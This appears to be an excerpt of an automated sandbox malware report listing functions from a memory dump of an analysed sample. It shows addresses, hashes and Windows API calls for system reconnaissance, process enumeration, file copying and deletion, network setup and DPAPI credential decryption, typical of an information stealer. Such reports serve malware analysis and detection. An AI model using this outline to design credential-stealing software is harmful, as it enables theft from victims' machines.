VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
:h@, xrefs: 004065DD, 004065FD, 0040667F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,040673D8,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,040863D0,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04087058,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040839E8), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04087058,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040839E8), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04086460,00000000,?,0041D758,00000000,?,00000000,00000000,?,04086E98,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,04086460,00000000,?,0041D758,00000000,?,00000000,00000000,?,04086E98,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,04086ED8,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04086520,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04067288,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04086D38,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,040864A8,00000000,?,0041D774,00000000,?,00000000,00000000,?,040863E8), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,0406C1E0,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,04086388), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: b7f4a53806341329f0c8cf58e5e612071402de3d3ed0e05b65ae4abbc920533e
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: b7f4a53806341329f0c8cf58e5e612071402de3d3ed0e05b65ae4abbc920533e
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 00406884, 0040689F, 004067C2, 0040684E, 0040679E

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,040837D8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04083938), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,040837E8), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,040837D8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04083938), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,040837E8), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,04086D58), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,04083B88), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

